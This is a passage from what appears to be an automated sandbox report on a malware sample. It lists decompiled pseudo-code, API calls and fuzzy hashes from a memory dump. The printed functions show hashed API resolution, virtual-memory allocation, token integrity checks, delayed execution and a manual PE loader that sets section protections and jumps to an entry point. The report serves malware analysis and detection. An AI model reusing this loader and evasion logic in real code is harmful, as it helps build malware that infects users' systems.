				E7056F558( &_v192, E7056F568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v196, E7056F568(_t381) + 0x10);
				E7056F558( &_v200, E7056F568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v204, E7056F568(_t385) + 0x10);
				E7056F558( &_v208, E7056F568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E7057413C(0xa5eabdf8, _t434);
				E7056F558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E7056F558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E7056F558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E7056F558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E7056F558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E7056F558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E7056F558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E7056F558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E7056F558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E7056F558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E7056F558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E7056F558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E7056F558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E7056F558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E7056F558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E7056F558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E7056F558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E70561D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E7056B338( &_v248, _v256, _t481, _v252, _t318);
				E7056F8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v296, E7056F568(_t410) + 0x10);
				E7056F558( &_v300, E7056F568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v304, E7056F568(_t414) + 0x10);
				E7056F558( &_v308, E7056F568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v312, E7056F568(_t418) + 0x10);
				E7056F558( &_v316, E7056F568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v320, E7056F568(_t422) + 0x10);
				E7056F558( &_v324, E7056F568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E7056BAB8(_t154,  *_t480);
				E7056F558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0"); // executed
				E7056F558( &_v344, 0x10); // executed
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E7056F558( &_v348, "true");
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E7056F558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E7056F6F0( &_v316);
				return E7056F6F0( &_v356);
			}

0x70561494
0x70561498
0x7056149d
0x705614a3
0x705614ab
0x705614b0
0x705614bc
0x705614c0
0x705614d2
0x705614e8
0x705614f3
0x705614f4
0x705614f5
0x705614f6
0x705614f7
0x705614fa
0x705614fe
0x70561502
0x70561509
0x7056151b
0x70561531
0x7056153c
0x7056153d
0x7056153e
0x7056153f
0x70561540
0x70561543
0x70561547
0x7056154b
0x70561552
0x70561564
0x7056157a
0x70561585
0x70561586
0x70561587
0x70561588
0x70561589
0x7056158c
0x70561590
0x70561594
0x7056159b
0x705615ad
0x705615c3
0x705615ce
0x705615cf
0x705615d0
0x705615d1
0x705615d2
0x705615d5
0x705615d9
0x705615dd
0x705615e4
0x705615f6
0x7056160c
0x70561617
0x70561618
0x70561619
0x7056161a
0x7056161b
0x7056161e
0x70561622
0x70561626
0x7056162d
0x7056163f
0x70561655
0x70561660
0x70561661
0x70561662
0x70561663
0x70561664
0x70561667
0x7056166b
0x7056166f
0x70561676
0x70561688
0x7056169e
0x705616a9
0x705616aa
0x705616ab
0x705616ac
0x705616ad
0x705616b0
0x705616b4
0x705616b8
0x705616bf
0x705616d1
0x705616e7
0x705616f2
0x705616f3
0x705616f4
0x705616f5
0x705616f6
0x705616f9
0x705616fd
0x70561701
0x70561708
0x7056171a
0x70561730
0x7056173b
0x7056173c
0x7056173d
0x7056173e
0x7056173f
0x70561742
0x70561746
0x7056174a
0x70561751
0x70561763
0x70561779
0x70561784
0x70561785
0x70561786
0x70561787
0x70561788
0x7056178b
0x7056178f
0x70561793
0x7056179a
0x705617ac
0x705617c2
0x705617cd
0x705617ce
0x705617cf
0x705617d0
0x705617d1
0x705617d4
0x705617d8
0x705617dc
0x705617e3
0x705617f5
0x7056180b
0x70561816
0x70561817
0x70561818
0x70561819
0x7056181a
0x7056181d
0x70561821
0x70561825
0x7056182c
0x7056183e
0x70561854
0x7056185f
0x70561860
0x70561861
0x70561862
0x70561863
0x70561866
0x7056186a
0x7056186e
0x70561875
0x70561887
0x7056189d
0x705618a8
0x705618a9
0x705618aa
0x705618ab
0x705618ac
0x705618af
0x705618b3
0x705618b7
0x705618be
0x705618d0
0x705618e6
0x705618f1
0x705618f2
0x705618f3
0x705618f4
0x705618f5
0x705618f8
0x705618fc
0x70561900
0x70561907
0x70561919
0x7056192f
0x7056193a
0x7056193b
0x7056193c
0x7056193d
0x7056193e
0x70561941
0x70561945
0x70561949
0x70561950
0x70561962
0x70561978
0x70561983
0x70561984
0x70561985
0x70561986
0x7056198c
0x7056198f
0x70561991
0x7056199c
0x705619a3
0x705619ac
0x705619b4
0x705619bb
0x705619c4
0x705619cc
0x705619d3
0x705619dc
0x705619e4
0x705619eb
0x705619f4
0x705619fc
0x70561a03
0x70561a0c
0x70561a14
0x70561a1b
0x70561a24
0x70561a2c
0x70561a36
0x70561a3f
0x70561a47
0x70561a51
0x70561a5a
0x70561a62
0x70561a6c
0x70561a75
0x70561a7d
0x70561a87
0x70561a90
0x70561a98
0x70561aa2
0x70561aab
0x70561ab3
0x70561abd
0x70561ac6
0x70561ace
0x70561ad8
0x70561ae1
0x70561ae9
0x70561af3
0x70561afc
0x70561b04
0x70561b0e
0x70561b17
0x70561b1f
0x70561b26
0x70561b2f
0x70561b37
0x70561b3e
0x70561b43
0x70561b51
0x70561b55
0x70561b64
0x70561b6d
0x70561b72
0x70561b79
0x70561b7d
0x70561b81
0x70561b88
0x70561b9a
0x70561bb0
0x70561bbb
0x70561bbc
0x70561bbd
0x70561bbe
0x70561bbf
0x70561bc2
0x70561bc6
0x70561bca
0x70561bd1
0x70561be3
0x70561bf9
0x70561c04
0x70561c05
0x70561c06
0x70561c07
0x70561c08
0x70561c0b
0x70561c0f
0x70561c13
0x70561c1a
0x70561c2c
0x70561c42
0x70561c4d
0x70561c4e
0x70561c4f
0x70561c50
0x70561c51
0x70561c54
0x70561c58
0x70561c5c
0x70561c63
0x70561c75
0x70561c8b
0x70561c96
0x70561c97
0x70561c98
0x70561c99
0x70561c9a
0x70561c9d
0x70561ca0
0x70561ca1
0x70561ca2
0x70561ca9
0x70561cac
0x70561cb7
0x70561cbe
0x70561cc7
0x70561ccf
0x70561cd6
0x70561cdf
0x70561ce7
0x70561cee
0x70561cf7
0x70561cff
0x70561d04
0x70561d0d
0x70561d15
0x70561d2a

Strings

$#,, xrefs: 70561701

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction ID: 63e4251258c2774a89aa81dbff4970c0f1f8b9332d74d15e86d9f8a3d2861264
Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction Fuzzy Hash: AE3253728187059EC705DF20C85699FBBB0AFF2605F10471EB49A2A1A1FF71FA86C752

Uniqueness

Uniqueness Score: -1.00%

Function 7057218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E7057218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E70573A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E70572F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x7057218c
0x70572190
0x705721ac
0x705721af
0x70572192
0x705721a1
0x705721a4
0x705721a4
0x705721bf
0x705721c4
0x705721c8
0x705721d0
0x705721d0
0x705721d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,705635C3,00000000,00000000,?), ref: 705721D0

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: a074c308117be290975cc84e4ba00d2db4acdf30130c960e1cb5864ef94477d1
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: 4EE09BB010E3116EEB449F288D05B2F7EF8EFC0211F60C91DB595D62C4F630D800A722

Uniqueness

Uniqueness Score: -1.00%

Function 70572790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70572790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E70572F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x70572797
0x705727a0
0x705727ae
0x705727d1
0x705727d1
0x705727b0
0x705727c7
0x705727cb
0x00000000
0x705727cd
0x705727cd
0x705727cd
0x705727cb
0x705727d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,70578852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 705727C7

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: 22bb9fc8b7c2b22f1c86c658b4d0f6ed99a43a509bc7e12b456758b0d1203e66
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: A3E0397120D342AFEB09DE24CD19E6FBBEDEF88200F109C1DB496C6550E770D840A722

Uniqueness

Uniqueness Score: -1.00%

Function 70573060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E70573060(intOrPtr* __ecx) {
				void* _t1;

				_push(E705733D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x70573060
0x70573065
0x70573067
0x70573069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,705733D8,70573050,A5EABDF8,A5EABDF8,?,70562530,00000001), ref: 70573067

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: a330b92ad183d9eb04e4c1d581fe708e8268df9d8a5f2b86c15376b59ad63b7e
Instruction ID: bc0010526aba233638771b9a404684cc555c74a2a8827010c4851ae27b4ed629
Opcode Fuzzy Hash: a330b92ad183d9eb04e4c1d581fe708e8268df9d8a5f2b86c15376b59ad63b7e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03152213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E03152213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x3154418 = 1;
				asm("movaps xmm0, [0x3153010]");
				asm("movups [0x3154428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E03152569();
				E03151D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E03152569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x3154418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E03152569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x0315221f
0x0315222d
0x03152234
0x03152237
0x03152241
0x03152248
0x03152252
0x03152258
0x03152261
0x0315226a
0x0315226d
0x03152273
0x03152277
0x0315227f
0x03152283
0x03152286
0x03152289
0x0315228c
0x0315228f
0x031522a9
0x031522af
0x031522b2
0x031522ba
0x031522be
0x031522c1
0x031522c4
0x031522c7
0x031522ca
0x031522e6
0x03152303
0x03152328
0x0315232a
0x03152333
0x03152336
0x03152340
0x03152343
0x03152346
0x03152349
0x0315234c
0x031523a4
0x031523a4
0x0315254a
0x03152550
0x0315244d
0x03152453
0x0315249f
0x0315249f
0x031524bc
0x031524e2
0x031524f0
0x031524f3
0x031524f7
0x031524fb
0x03152502
0x03152508
0x0315250a
0x0315251c
0x03152524
0x0315252a
0x03152530
0x03152536
0x00000000
0x00000000
0x0315253c
0x0315249f
0x0315245b
0x03152469
0x03152471
0x03152474
0x03152476
0x0315247c
0x03152488
0x0315248e
0x03152491
0x03152494
0x0315238a
0x0315238a
0x031523d8
0x031523de
0x031523e4
0x031523ea
0x031523f0
0x031523f5
0x031523fb
0x031523fe
0x03152401
0x03152409
0x03152411
0x03152414
0x03152417
0x0315241d
0x03152423
0x0315242e
0x03152362
0x03152368
0x03152368
0x031523c5

APIs

VirtualProtect.KERNELBASE ref: 0315228F
VirtualProtect.KERNELBASE ref: 03152328

Strings

t, xrefs: 03152409

Memory Dump Source

Source File: 00000003.00000002.491898377.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 1e2c4a7c63fca7c1e6f1847a1070a198ba125b0a0789e60514e7ef288bd4ced2
Instruction ID: 473db6f157f5d33f5fcd316b966f8fd030c69df838c528329d286b03de887154
Opcode Fuzzy Hash: 1e2c4a7c63fca7c1e6f1847a1070a198ba125b0a0789e60514e7ef288bd4ced2
Instruction Fuzzy Hash: 0A8176B9A04208DFCB04DF99C580A9DFBF1BF8C310F65856AE958AB351D730A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 70575DF0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70575DF0(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E7056C33C(_t19) == 0) {
					_t2 =  &_a8; // 0x70575ce5
					_v12 =  *_t2;
					if(E70572F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E7057352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x70575df3
0x70575df5
0x70575e01
0x70575e07
0x70575e0b
0x70575e21
0x70575e40
0x70575e23
0x70575e34
0x70575e38
0x70575e58
0x70575e3a
0x70575e3a
0x70575e3a
0x70575e38
0x70575e41
0x70575e46
0x70575e4f
0x70575e48
0x70575e48
0x70575e4a
0x70575e4a
0x70575e03
0x70575e03
0x70575e03
0x70575e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,70575CE5,00000000,?,00000000,?), ref: 70575E34

Strings

\Wp, xrefs: 70575E07

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: \Wp
API String ID: 2738559852-3943066637
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: 0abfbdc942b44b5fa9c319c88ef24e26e224b209d601ab7cfb6959211420549a
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: E8F08631208212AED712AE25CC40A6E7FEDAB44350F20DC6EBC9AD2144DA61DA04A621

Uniqueness

Uniqueness Score: -1.00%

Function 70571140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E70571140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E70572F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E7056C33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E7056BC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E70572F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E7056F620( &_v32, _t24);
						_t54 = E7056F558( &(_t59[3]), 0);
						if(E70572F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L14:
							E7056F6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L14;
							} else {
								_t33 = E70572F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L14;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x70571142
0x7057114f
0x70571151
0x70571160
0x70571164
0x7057116e
0x7057116e
0x70571174
0x70571177
0x70571179
0x70571184
0x705711be
0x705711c3
0x705711c8
0x705711c8
0x705711d4
0x70571186
0x70571190
0x705711a3
0x705711b4
0x705711b4
0x705711b6
0x705711bc
0x705711da
0x705711ea
0x70571201
0x705712e3
0x705712e7
0x00000000
0x70571207
0x70571217
0x7057121b
0x00000000
0x70571221
0x7057122d
0x70571234
0x00000000
0x7057123a
0x7057123a
0x7057123c
0x7057123d
0x7057123d
0x70571234
0x7057121b
0x00000000
0x00000000
0x00000000
0x705711bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 705711B4
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 70571217

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction ID: c4eec53b5c2f1993b8fd5f9f1344c7a86258e6161d1b16a98975cb1797ec7afb
Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
